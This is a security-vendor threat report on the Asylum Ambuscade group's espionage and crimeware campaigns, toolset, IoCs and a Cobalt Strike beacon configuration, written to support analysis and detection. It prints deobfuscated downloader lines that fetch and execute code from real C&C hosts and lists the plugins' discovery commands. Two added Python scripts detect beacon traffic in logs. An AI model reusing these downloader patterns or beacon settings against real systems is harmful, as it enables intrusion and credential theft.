URL: https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/
ASYLUM AMBUSCADE: CRIMEWARE OR CYBERESPIONAGE?

A curious case of a threat actor at the border between crimeware and
cyberespionage
Matthieu Faou
8 Jun 2023 - 11:30AM

Asylum Ambuscade is a cybercrime group that has been performing cyberespionage
operations on the side. They were first publicly outed in March 2022 by
Proofpoint researchers after the group targeted European government staff
involved in helping Ukrainian refugees, just a few weeks after the start of the
Russia-Ukraine war. In this blogpost, we provide details about the early 2022
espionage campaign and about multiple cybercrime campaigns in 2022 and 2023.

Key points of this blogpost:

 * Asylum Ambuscade has been operating since at least 2020.
 * It is a crimeware group that targets bank customers and cryptocurrency
   traders in various regions, including North America and Europe.
 * Asylum Ambuscade also does espionage against government entities in Europe
   and Central Asia.
 * Most of the group’s implants are developed in scripting languages such as
   AutoHotkey, JavaScript, Lua, Python, and VBS.


CYBERESPIONAGE CAMPAIGNS

Asylum Ambuscade has been running cyberespionage campaigns since at least 2020.
We found previous compromises of government officials and employees of
state-owned companies in Central Asian countries and Armenia.

In 2022, and as highlighted in the Proofpoint publication, the group targeted
government officials in several European countries bordering Ukraine. We assess
that the goal of the attackers was to steal confidential information and webmail
credentials from official government webmail portals.

The compromise chain starts with a spearphishing email that has a malicious
Excel spreadsheet attachment. Malicious VBA code therein downloads an MSI
package from a remote server and installs SunSeed, a downloader written in Lua.

Note that we observed some variations in the attachments. In June 2022, the
group used an exploit of the Follina vulnerability (CVE-2022-30190) instead of
malicious VBA code. This document is shown in Figure 1. It is written in
Ukrainian and the decoy is about a security alert regarding a Gamaredon (another
well-known espionage group) attack in Ukraine.

Figure 1. Document leveraging the Follina vulnerability

Then, if the machine is deemed interesting, the attackers deploy the next stage:
AHKBOT. This is a downloader written in AutoHotkey that can be extended with
plugins, also written in AutoHotkey, in order to spy on the victim’s machine. An
analysis of the group’s toolset is provided later in the blogpost.


CYBERCRIME CAMPAIGNS

Even though the group came into the spotlight because of its cyberespionage
operations, it has been mostly running cybercrime campaigns since early 2020.

Since January 2022, we have counted more than 4,500 victims worldwide. While
most of them are located in North America, as shown in Figure 2, it should be
noted that we have also seen victims in Asia, Africa, Europe, and South America.

Figure 2. Geographical distribution of victims since January 2022

The targeting is very wide and mostly includes individuals, cryptocurrency
traders, and small and medium businesses (SMBs) in various verticals.

While the goal of targeting cryptocurrency traders is quite obvious – stealing
cryptocurrency – we don’t know for sure how Asylum Ambuscade monetizes its
access to SMBs. It is possible the group sells the access to other crimeware
groups who might, for example, deploy ransomware. We have not observed this in
our telemetry, though.

Asylum Ambuscade’s crimeware compromise chain is, overall, very similar to the
one we describe for the cyberespionage campaigns. The main difference is the
compromise vector, which can be:

 * A malicious Google Ad redirecting to a website delivering a malicious
   JavaScript file (as highlighted in this SANS blogpost)
 * Multiple HTTP redirections in a Traffic Direction System (TDS). The TDS used
   by the group is referred to as 404 TDS by Proofpoint. It is not exclusive to
   Asylum Ambuscade and we observed it was, for example, used by another threat
   actor to deliver Qbot. An example of a redirection chain, captured by
   urlscan.io, is shown in Figure 3.

Figure 3. 404 TDS redirection chain, as captured by urlscan.io – numbers
indicate the redirections in sequence

In addition to the different compromise vector, the group developed SunSeed
equivalents in other scripting languages such as Tcl and VBS. In March 2023, it
developed an AHKBOT equivalent in Node.js that we named NODEBOT. We believe
those changes were intended to bypass detections from security products. An
overview of the compromise chain is provided in Figure 4.

Figure 4. Compromise chain


ATTRIBUTION

We believe that the cyberespionage and cybercrime campaigns are operated by the
same group.

 * The compromise chains are almost identical in all campaigns. In particular,
   SunSeed and AHKBOT have been widely used for both cybercrime and
   cyberespionage.
 * We don’t believe that SunSeed and AHKBOT are sold on the underground market.
   These tools are not very sophisticated in comparison to other crimeware tools
   for sale, the number of victims would be quite low for a toolset shared among
   multiple groups, and the network infrastructure is consistent across
   campaigns.

As such, we believe that Asylum Ambuscade is a cybercrime group that is doing
some cyberespionage on the side.

We also believe that these three articles describe incidents related to the
group:

 * A TrendMicro article from 2020: Credential Stealer Targets US, Canadian Bank
   Customers
 * A Proofpoint article from 2022: Asylum Ambuscade: State Actor Uses Lua-based
   Sunseed Malware to Target European Governments and Refugee Movement
 * A Proofpoint article from 2023: Screentime: Sometimes It Feels Like
   Somebody’s Watching Me


TOOLSET


MALICIOUS JAVASCRIPT FILES

In most crimeware campaigns run by the group, the compromise vector is not a
malicious document, but a JavaScript file downloaded from the previously
documented TDS. Note that it has to be manually executed by the victim, so the
attackers are trying to entice people into clicking on the files by using
filenames such as Document_12_dec-1532825.js, TeamViewer_Setup.js, or
AnyDeskInstall.js.

Those scripts are obfuscated using random variable names and junk code, most
likely intended to bypass detections. An example is provided in Figure 5.

Figure 5. Obfuscated JavaScript downloader

Once deobfuscated, this script can be summarized in two lines:

var obj = new ActiveXObject("windowsinstaller.installer");
obj.InstallProduct("https://namesilo.my[.]id/css/ke.msi");




FIRST-STAGE DOWNLOADERS

The first stage downloaders are dropped by an MSI package downloaded by either a
malicious document or a JavaScript file. There are three versions of this
downloader:

 * Lua (SunSeed)
 * Tcl
 * VBS

SunSeed is a downloader written in the Lua language and heavily obfuscated, as
shown in Figure 6.

Figure 6. The SunSeed Lua variant is heavily obfuscated

Once manually deobfuscated, the main function of the script looks like this:

require('socket.http')
serial_number = Drive.Item('C').SerialNumber
server_response = socket.request(http://84.32.188[.]96/ + serial_number)
pcall(loadstring(server_response))
collectgarbage()
<jump to the start and retry>


It gets the serial number of the C: drive and sends a GET request to
http://<C&C>/<serial_number> using the User-Agent LuaSocket 2.0.2. It then tries
to execute the reply. This means that SunSeed expects to receive additional Lua
scripts from the C&C server. We found two of those scripts: install and move.

install is a simple Lua script that downloads an AutoHotkey script into
C:\ProgramData\mscoree.ahk and the legitimate AutoHotkey interpreter into
C:\ProgramData\mscoree.exe, as shown in Figure 7. This AutoHotkey script is
AHKBOT, the second stage downloader.

Figure 7. Lua script that downloads an AutoHotkey script

An even simpler Lua script, move, is shown in Figure 8. It is used to reassign
management of a victimized computer from one C&C server to another. It is not
possible to update the hardcoded SunSeed C&C server; to complete a C&C
reassignment, a new MSI installer needs to be downloaded and executed, exactly
as when the machine was first compromised.

Figure 8. Lua script to move management of a compromised machine from one C&C
server to another

As mentioned above, we found another variant of SunSeed developed using the Tcl
language instead of Lua, as shown in Figure 9. The main difference is that it
doesn’t send the C: drive’s serial number in the GET request.

Figure 9. SunSeed variant in Tcl

The third variant was developed in VBS, as shown in Figure 10. The main
difference is that it doesn’t download and interpret additional code, but
downloads and executes an MSI package.

Figure 10. SunSeed variant in VBS


SECOND-STAGE DOWNLOADERS

The main second-stage downloader is AHKBOT, developed in AutoHotkey. As shown in
Figure 11, it sends a GET request, with the User-Agent AutoHotkey (the default
value used by AutoHotkey), to http://<C&C>/<serial_number_of_C_drive>-RP, almost
exactly as the earlier SunSeed. RP might be a campaign identifier, as it changes
from sample to sample.

Figure 11. AHKBOT
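The two beacon shapes described above (SunSeed's GET to http://<C&C>/<serial_number> with User-Agent LuaSocket 2.0.2, and AHKBOT's GET to http://<C&C>/<serial_number>-RP with User-Agent AutoHotkey) are distinctive enough to hunt for in proxy logs. The following Python detector is an added example, not code from the blogpost or from ESET; the log line layout, the client and server addresses and the sample traffic are constructed for the example, and the "RP" suffix is matched loosely because the post says it changes from sample to sample.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Beacon shapes taken from the blogpost:
#   SunSeed (Lua):  GET http://<C&C>/<serial_number>      User-Agent: LuaSocket 2.0.2
#   AHKBOT (AHK):   GET http://<C&C>/<serial_number>-RP   User-Agent: AutoHotkey
# <serial_number> is the decimal volume serial of the C: drive (a 32-bit value),
# and "RP" is a suspected campaign identifier that changes between samples, so
# the suffix is matched as a short run of capital letters, not the literal RP.
SUNSEED_PATH = re.compile(r"^/\d{1,10}$")
AHKBOT_PATH = re.compile(r"^/\d{1,10}-[A-Z]{1,8}$")
SUSPICIOUS_AGENTS = {"LuaSocket 2.0.2": "SunSeed", "AutoHotkey": "AHKBOT"}

# Constructed, simplified proxy log layout (an assumption of this example):
#   <timestamp> <client_ip> <method> <url> "<user-agent>"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
URL_RE = re.compile(r"^https?://([^/]+)(/.*)?$")


@dataclass
class Hit:
    timestamp: str
    client: str
    host: str
    path: str
    family: str
    severity: str  # "high": agent and path both match; "low": agent only
    reason: str


def classify(method: str, url: str, user_agent: str) -> Optional[Tuple[str, str, str]]:
    """Return (family, severity, reason) for a beacon-like request, else None."""
    m = URL_RE.match(url)
    if method != "GET" or not m:
        return None
    path = m.group(2) or "/"
    if user_agent == "LuaSocket 2.0.2" and SUNSEED_PATH.match(path):
        return "SunSeed", "high", "LuaSocket user-agent and numeric serial path"
    if user_agent == "AutoHotkey" and AHKBOT_PATH.match(path):
        return "AHKBOT", "high", "AutoHotkey user-agent and <serial>-<id> path"
    # The agent alone is a weak signal: AutoHotkey is the interpreter's default
    # user-agent, so benign scripts send it too. Surface it at low severity.
    if user_agent in SUSPICIOUS_AGENTS:
        return SUSPICIOUS_AGENTS[user_agent], "low", "unusual user-agent only"
    return None


def scan_log(lines: Iterable[str]) -> List[Hit]:
    """Parse proxy log lines and return every request that looks like a beacon."""
    hits: List[Hit] = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # malformed line: skip it rather than abort the whole scan
        ts, client, method, url, ua = m.groups()
        verdict = classify(method, url, ua)
        if verdict is None:
            continue
        family, severity, reason = verdict
        host_path = URL_RE.match(url)  # already validated inside classify()
        hits.append(Hit(ts, client, host_path.group(1), host_path.group(2) or "/",
                        family, severity, reason))
    return hits


# Constructed sample traffic: 203.0.113.10 stands in for a C&C server and
# 2786990575 is one of the debugging serial numbers quoted in the blogpost.
SAMPLE_LOG = [
    '2023-03-01T10:00:00Z 10.0.0.5 GET http://203.0.113.10/2786990575 "LuaSocket 2.0.2"',
    '2023-03-01T10:00:31Z 10.0.0.5 GET http://203.0.113.10/2786990575-RP "AutoHotkey"',
    '2023-03-01T10:01:02Z 10.0.0.7 GET http://www.example.com/index.html "Mozilla/5.0"',
    '2023-03-01T10:01:40Z 10.0.0.9 GET http://updates.example.net/version.txt "AutoHotkey"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"[{hit.severity}] {hit.timestamp} {hit.client} -> {hit.host}{hit.path}: "
              f"{hit.family} ({hit.reason})")
```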

AHKBOT can be found on disk at various locations, such as
C:\ProgramData\mscoree.ahk or C:\ProgramData\adb.ahk. It downloads and
interprets spy plugins, also developed in AutoHotkey. A summary of the 21
plugins is provided in Table 1.

Table 1. SunSeed plugins

Plugin name – Description

ass – Download and execute a Cobalt Strike loader packed with VMProtect. The
beacon’s configuration extracted using the tool CobaltStrikeParser is provided
in the IoCs in the Cobalt Strike configuration section.

connect – Send the log message connected! to the C&C server.

deletecookies – Download SQLite from /download?path=sqlite3slashsqlite3dotdll
via HTTP from its C&C server, then delete browser cookies for the domains td.com
(a Canadian bank) and mail.ru. We don’t know why the attackers need to delete
cookies, especially for these domains. It’s possible it is intended to delete
session cookies to force its victims to reenter their credentials that would
then be captured by the keylogger.

deskscreen – Take a screenshot using Gdip.BitmapFromScreen and send it to the
C&C server.

deskscreenon – Similar to deskscreen but take screenshots in a 15-second loop.

deskscreenoff – Stop the deskscreenon loop.

domain – Gather information about the Active Directory using the following
commands:
  · cmd /c chcp 65001 && net group "domain admins" /domain
  · cmd /c chcp 65001 && net group "enterprise admins" /domain
  · cmd /c chcp 65001 && net group ""Domain Computers"" /domain
  · cmd /c chcp 65001 && nltest /dclist:
  · cmd /c chcp 65001 && nltest /DOMAIN_TRUSTS
  · cmd /c chcp 65001 && ipconfig /all
  · cmd /c chcp 65001 && systeminfo

hardware – Get victim’s host information using WMI queries:
  · Select * from Win32_OperatingSystem
  · SELECT * FROM Win32_LogicalDisk
  · SELECT * FROM Win32_Processor
  · Select * from Win32_OperatingSystem
  · SELECT * FROM Win32_VideoController
  · Select * from Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
  · Select * from FirewallProduct
  · Select * from AntiSpywareProduct
  · Select * from AntiVirusProduct
  · SELECT * FROM Win32_Product
  · SELECT Caption,ExecutablePath,ProcessID FROM Win32_Process where
    ExecutablePath is not null
and send to the C&C server.

hvncon – Download and execute a custom hVNC (hidden VNC) application from
http://<C&C>/download?path=hvncslashhvncdotzip

hvncoff – Stop the hVNC by executing taskkill /f /im hvnc.exe.

installchrome – Download http://<C&C>/download?path=chromeslashchromedotzip, a
legitimate copy of Google Chrome, and unpack it into
%LocalAppData%\Google\Chrome\Application. This copy of Chrome is likely used by
hVNC if the victim doesn’t have Chrome installed.

keylogon – Start the keylogger, hooked input using DllCall("SetWindowsHookEx",
[…]). The keystrokes are sent to the C&C server when the active application
changes.

keylogoff – Stop the keylogger.

passwords – Steal passwords from Internet Explorer, Firefox, and Chromium-based
browsers. It downloads SQLite to read the browser storages. It can also decrypt
locally encrypted passwords by calling the Microsoft CryptUnprotectData
function. Stolen passwords are sent to the C&C server. This plugin looks very
similar to the password stealer described by Trend Micro in 2020, including the
hard drive serial numbers used for debugging: 605109072 and 2786990575. This
could indicate that it is still being developed on the same machines.

rutservon – Download a remote access trojan (RAT) from
http://<C&C>/download?path=rutservslashagent6dot10dotexe (SHA-1:
3AA8A4554B175DB9DA5EEB7824B5C047638A6A9D). This is a commercial RAT developed
by Remote Utilities LLC that provides full control over the machine on which it
is installed.

rutservoff – Kill the RAT.

steal – Download and execute an infostealer – probably based on Rhadamanthys.

tasklist – List running processes by using the WMI query Select * from
Win32_Process.

towake – Move the mouse using MouseMove, 100, 100. This is likely to prevent the
computer from going to sleep, especially given the name of the plugin.

update – Download a new version of SunSeed AutoHotkey from the C&C server and
replace the current SunSeed on disk. The AutoHotkey interpreter is located in
C:\ProgramData\adb.exe.

wndlist – List active windows by calling WinGet windows, List (Autohotkey
syntax).

The plugins send the result back to the C&C server using a log function, as
shown in Figure 12.

Figure 12. Log function

In March 2023, the attackers developed a variant of AHKBOT in Node.js that we
have named NODEBOT – see Figure 13.

Figure 13. NODEBOT

The attackers also rewrote some AHKBOT plugins in JavaScript to make them
compatible with NODEBOT. So far, we have observed the following plugins (an
asterisk indicates that the plugin is new to NODEBOT):

 * connect
 * deskscreen
 * hardware
 * hcmdon (a reverse shell in Node.js)*
 * hvncoff
 * hvncon
 * keylogoff
 * keylogon (download and execute the AutoHotkey keylogger)
 * mods (download and install hVNC)*
 * passwords
 * screen


CONCLUSION

Asylum Ambuscade is a cybercrime group mostly targeting SMBs and individuals in
North America and Europe. However, it appears to be branching out, running some
recent cyberespionage campaigns on the side, against governments in Central Asia
and Europe from time to time.

It is quite unusual to catch a cybercrime group running dedicated cyberespionage
operations, and as such we believe that researchers should keep close track of
Asylum Ambuscade activities.







IOCS


FILES



NETWORK



COBALT STRIKE CONFIGURATION



BeaconType                       - HTTP
Port                             - 80
SleepTime                        - 45000
MaxGetSize                       - 2801745
Jitter                           - 37
MaxDNS                           - Not Found
PublicKey_MD5                    - e4394d2667cc8f9d0af0bbde9e808c29
C2Server                         - snowzet[.]com,/jquery-3.3.1.min.js
UserAgent                        - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)
HttpPostUri                      - /jquery-3.3.2.min.js
Malleable_C2_Instructions        - Remove 1522 bytes from the end
                                   Remove 84 bytes from the beginning
                                   Remove 3931 bytes from the beginning
                                   Base64 URL-safe decode
                                   XOR mask w/ random key
HttpGet_Metadata                 - ConstHeaders
                                   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                   Referer: http://code.jquery.com/
                                   Accept-Encoding: gzip, deflate
                                   Metadata
                                   base64url
                                   prepend "__cfduid="
                                   header "Cookie"
HttpPost_Metadata                - ConstHeaders
                                   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                   Referer: http://code.jquery.com/
                                   Accept-Encoding: gzip, deflate
                                   SessionId
                                   mask
                                   base64url
                                   parameter "__cfduid"
                                   Output
                                   mask
                                   base64url
                                   print
PipeName                         - Not Found
DNS_Idle                         - Not Found
DNS_Sleep                        - Not Found
SSH_Host                         - Not Found
SSH_Port                         - Not Found
SSH_Username                     - Not Found
SSH_Password_Plaintext           - Not Found
SSH_Password_Pubkey              - Not Found
SSH_Banner                       -
HttpGet_Verb                     - GET
HttpPost_Verb                    - POST
HttpPostChunk                    - 0
Spawnto_x86                      - %windir%\syswow64\dllhost.exe
Spawnto_x64                      - %windir%\sysnative\dllhost.exe
CryptoScheme                     - 0
Proxy_Config                     - Not Found
Proxy_User                       - Not Found
Proxy_Password                   - Not Found
Proxy_Behavior                   - Use IE settings
Watermark                        - 206546002
bStageCleanup                    - True
bCFGCaution                      - False
KillDate                         - 0
bProcInject_StartRWX             - False
bProcInject_UseRWX               - False
bProcInject_MinAllocSize         - 17500
ProcInject_PrependAppend_x86     - b'\x90\x90'
                                   Empty
ProcInject_PrependAppend_x64     - b'\x90\x90'
                                   Empty
ProcInject_Execute               - ntdll:RtlUserThreadStart
                                   CreateThread
                                   NtQueueApcThread-s
                                   CreateRemoteThread
                                   RtlCreateUserThread
ProcInject_AllocationMethod      - NtMapViewOfSection
bUsesCookies                     - True
HostHeader                       -
headersToRemove                  - Not Found
DNS_Beaconing                    - Not Found
DNS_get_TypeA                    - Not Found
DNS_get_TypeAAAA                 - Not Found
DNS_get_TypeTXT                  - Not Found
DNS_put_metadata                 - Not Found
DNS_put_output                   - Not Found
DNS_resolver                     - Not Found
DNS_strategy                     - round-robin
DNS_strategy_rotate_seconds      - -1
DNS_strategy_fail_x              - -1
DNS_strategy_fail_seconds        - -1
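The network-visible constants in the dump above (the User-Agent string, the HttpPostUri, the constant Referer header pointing at code.jquery.com, and the "__cfduid" cookie and query parameter that carry the beacon metadata and session id) are what a defender can turn into detection logic. The Python script below is an added example, not code from the article or from ESET: it parses an excerpt of the dump in the "Key - Value" layout shown above, extracts those constants, and scores constructed HTTP log lines against them. The tab-separated log format, the parse_beacon_config, build_indicators, score_request and scan_log helpers, the 128-byte minimum decoded cookie size (the size of RSA-1024-encrypted beacon metadata) and the two-indicator alert threshold are all assumptions of the example. The beacon's GET URI is not part of this excerpt, so the sample check-in line uses "/" as a placeholder.

```python
import base64, binascii, re
from urllib.parse import parse_qs

# Excerpt of the beacon configuration printed in the article, re-typed in the
# dump's own "Key - Value" layout (indented lines continue the key above).
CONFIG_DUMP = """\
UserAgent                        - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)
HttpPostUri                      - /jquery-3.3.2.min.js
HttpGet_Metadata                 - ConstHeaders
                                   Referer: http://code.jquery.com/
                                   Metadata
                                   base64url
                                   prepend "__cfduid="
                                   header "Cookie"
HttpPost_Metadata                - ConstHeaders
                                   Referer: http://code.jquery.com/
                                   SessionId
                                   mask
                                   base64url
                                   parameter "__cfduid"
"""
# RSA-1024-encrypted beacon metadata is 128 bytes; using that as the minimum
# decoded size of a suspicious cookie value is this example's assumption.
METADATA_MIN_BYTES = 128

def parse_beacon_config(dump):
    """Map each key to [first value, continuation lines...]."""
    config, current = {}, None
    for raw in dump.splitlines():
        m = re.match(r"^(\S+)\s+-\s*(.*)$", raw)
        if m:                                        # new key at column 0
            current = m.group(1)
            config[current] = [m.group(2).strip()] if m.group(2).strip() else []
        elif raw.strip() and current is not None:    # indented continuation
            config[current].append(raw.strip())
    return config

def build_indicators(config):
    """Pull the network-visible constants a detection can key on."""
    ind = {"user_agent": config["UserAgent"][0], "post_uri": config["HttpPostUri"][0],
           "referer": None, "cookie_prefix": None, "post_param": None}
    for line in config.get("HttpGet_Metadata", []):
        if line.startswith("Referer:"):
            ind["referer"] = line.split(":", 1)[1].strip()
        if m := re.match(r'prepend "([^"]*)"', line):
            ind["cookie_prefix"] = m.group(1)
    for line in config.get("HttpPost_Metadata", []):
        if m := re.match(r'parameter "([^"]*)"', line):
            ind["post_param"] = m.group(1)
    return ind

def _b64url_decode(value):
    try:
        return base64.urlsafe_b64decode(value + "=" * (-len(value) % 4))
    except (binascii.Error, ValueError):
        return None

def score_request(req, ind):
    """Return one reason per profile indicator the request matches."""
    reasons = []
    if req["user_agent"] == ind["user_agent"]:
        reasons.append("User-Agent equals the profile string")
    if ind["referer"] and req["referer"] == ind["referer"]:
        reasons.append("Referer equals the profile's constant header")
    path, _, query = req["uri"].partition("?")
    if req["method"] == "POST" and path == ind["post_uri"]:
        reasons.append("POST to HttpPostUri")
        if ind["post_param"] and ind["post_param"] in parse_qs(query):
            reasons.append("session id in query parameter " + ind["post_param"])
    prefix = ind["cookie_prefix"]
    for part in req["cookie"].split(";"):
        if prefix and part.strip().startswith(prefix):
            blob = _b64url_decode(part.strip()[len(prefix):])
            if blob is not None and len(blob) >= METADATA_MIN_BYTES:
                reasons.append(f"cookie decodes to {len(blob)} bytes (metadata size)")
    return reasons

def scan_log(lines, ind, min_hits=2):
    """Flag requests matching at least min_hits indicators (threshold assumed).
    Constructed log format, tab-separated: method, uri, user-agent, referer, cookie."""
    hits = []
    for i, line in enumerate(lines):
        method, uri, ua, referer, cookie = line.split("\t")
        req = {"method": method, "uri": uri, "user_agent": ua, "referer": referer, "cookie": cookie}
        reasons = score_request(req, ind)
        if len(reasons) >= min_hits:
            hits.append((i, reasons))
    return hits

INDICATORS = build_indicators(parse_beacon_config(CONFIG_DUMP))
# Constructed stand-ins: 128 bytes in the role of encrypted metadata and a short
# masked session id. Neither is real beacon traffic.
FAKE_METADATA = base64.urlsafe_b64encode(bytes(range(128))).decode().rstrip("=")
SAMPLE_LOG = [
    # ordinary browser fetching jQuery, carrying a Cloudflare-style 43-hex-char cookie
    "GET\t/jquery-3.3.2.min.js\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/113.0"
    "\thttps://example.test/\t__cfduid=d41d8cd98f00b204e9800998ecf8427e15662491211",
    # beacon check-in; the GET URI is not in the excerpt, so "/" is a placeholder
    "GET\t/\t" + INDICATORS["user_agent"] + "\thttp://code.jquery.com/\t__cfduid=" + FAKE_METADATA,
    # beacon posting task output: the session id travels in the query parameter
    "POST\t/jquery-3.3.2.min.js?__cfduid=QUJDREVGR0hJSktMTU5PUFFS\t" + INDICATORS["user_agent"]
    + "\thttp://code.jquery.com/\t",
]

if __name__ == "__main__":
    for i, reasons in scan_log(SAMPLE_LOG, INDICATORS):
        print(f"log line {i}: " + "; ".join(reasons))
```

The benign line is left alone because a legitimate Cloudflare-style cookie value decodes to far fewer than 128 bytes and the browser's User-Agent and Referer do not match the profile; the two beacon-shaped lines each collect several independent indicators, which is what makes the match robust to any single field being changed.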




MITRE ATT&CK TECHNIQUES

This table was built using version 13 of the MITRE ATT&CK framework.

Columns: Tactic, ID, Name, Description

Resource Development
  T1583.003 - Acquire Infrastructure: Virtual Private Server - Asylum Ambuscade rented VPS servers.
  T1587.001 - Develop Capabilities: Malware - Asylum Ambuscade develops custom implants in various scripting languages.

Initial Access
  T1189 - Drive-by Compromise - Targets were redirected via a TDS to a website delivering a malicious JavaScript file.
  T1566.001 - Phishing: Spearphishing Attachment - Targets receive malicious Excel or Word documents.

Execution
  T1059.005 - Command and Scripting Interpreter: Visual Basic - Asylum Ambuscade has a downloader in VBS.
  T1059.006 - Command and Scripting Interpreter: Python - Asylum Ambuscade has a screenshotter in Python.
  T1059.007 - Command and Scripting Interpreter: JavaScript - Asylum Ambuscade has a downloader in JavaScript (NODEBOT).
  T1059 - Command and Scripting Interpreter - Asylum Ambuscade has downloaders in other scripting languages such as Lua, AutoHotkey, or Tcl.
  T1204.002 - User Execution: Malicious File - Targets need to manually execute the malicious document or JavaScript file.

Persistence
  T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - SunSeed persists via a LNK file in the startup folder.

Defense Evasion
  T1027.010 - Obfuscated Files or Information: Command Obfuscation - Downloaded JavaScript files are obfuscated with junk code.

Credential Access
  T1555.003 - Credentials from Password Stores: Credentials from Web Browsers - The AHKBOT passwords plugin can steal browser credentials.

Discovery
  T1087.002 - Account Discovery: Domain Account - The AHKBOT domain plugin gathers information about the domain using net group.
  T1010 - Application Window Discovery - The AHKBOT wndlist plugin lists the active windows.
  T1482 - Domain Trust Discovery - The AHKBOT domain plugin gathers information using nltest.
  T1057 - Process Discovery - The AHKBOT tasklist plugin lists the active processes using Select * from Win32_Process.
  T1518.001 - Software Discovery: Security Software Discovery - The AHKBOT hardware plugin lists security software using Select * from FirewallProduct, Select * from AntiSpywareProduct and Select * from AntiVirusProduct.
  T1082 - System Information Discovery - The AHKBOT wndlist plugin gets system information using systeminfo.
  T1016 - System Network Configuration Discovery - The AHKBOT wndlist plugin gets network configuration information using ipconfig /all.

Collection
  T1056.001 - Input Capture: Keylogging - AHKBOT keylogon records keystrokes.
  T1115 - Clipboard Data - AHKBOT keylogon monitors the clipboard.
  T1113 - Screen Capture - AHKBOT deskscreen takes screenshots.

Command and Control
  T1071.001 - Application Layer Protocol: Web Protocols - AHKBOT (and all the other downloaders) communicates with the C&C server via HTTP.

Exfiltration
  T1041 - Exfiltration Over C2 Channel - Data is exfiltrated via the C&C channel.




Matthieu Faou
8 Jun 2023 - 11:30AM
